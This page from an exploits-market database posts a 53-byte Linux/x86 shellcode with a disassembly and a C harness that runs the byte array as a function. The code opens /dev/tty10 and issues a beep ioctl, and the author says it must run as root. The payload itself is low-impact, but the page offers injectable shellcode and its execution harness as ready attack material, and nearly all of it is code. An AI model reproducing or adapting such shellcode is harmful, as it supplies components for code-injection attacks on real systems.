[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

linux/x86 "low" frequency system beep shellcode 53 bytes

Author
gunslinger_
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12493
Category
shellcode
Date add
01-06-2010
Platform
linux/x86
========================================================
linux/x86 "low" frequency system beep shellcode 53 bytes
========================================================


/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name   : 53 bytes "low" frequency system beep x86 linux
Date   : juny, 1 2010
Author : gunslinger_
Web    : devilzc0de.com
blog   : gunslingerc0de.wordpress.com
tested on : linux debian (must run as root!)
*/
char *shellcode=
		"\xeb\x24"                    /* jmp    0x8048086 */
		"\x31\xc0"                    /* xor    %eax,%eax */
		"\xb0\x05"                    /* mov    $0x5,%al */
		"\x5b"                        /* pop    %ebx */
		"\x89\xd1"                    /* mov    %edx,%ecx */
		"\xcd\x80"                    /* int    $0x80 */
		"\x89\xc3"                    /* mov    %eax,%ebx */
		"\x6a\x36"                    /* push   $0x36 */
		"\x58"                        /* pop    %eax */
		"\xb9\xcf\xb4\xff\xff"        /* mov    $0xffffb4cf,%ecx */
		"\xf7\xd1"                    /* not    %ecx */
		"\xba\x18\xd4\x8f\x29"        /* mov    $0x298fd418,%edx */
		"\xcd\x80"                    /* int    $0x80 */
		"\x31\xc0"                    /* xor    %eax,%eax */
		"\xfe\xc0"                    /* inc    %al */
		"\x31\xdb"                    /* xor    %ebx,%ebx */
		"\xcd\x80"                    /* int    $0x80 */
		"\xe8\xd7\xff\xff\xff"        /* call   0x8048062 */
		"\x2f"                        /* das     */
		"\x64"                        /* fs */
		"\x65"                        /* gs */
		"\x76\x2f"                    /* jbe    0x80480bf */
		"\x74\x74"                    /* je     0x8048106 */
		"\x79\x31"                    /* jns    0x80480c5 */
		"\x30";                        /* .byte 0x30 */

int main(void)
{

		((void (*)(void)) shellcode)();
		return 0;
}



#  0day.today [2024-11-16]  #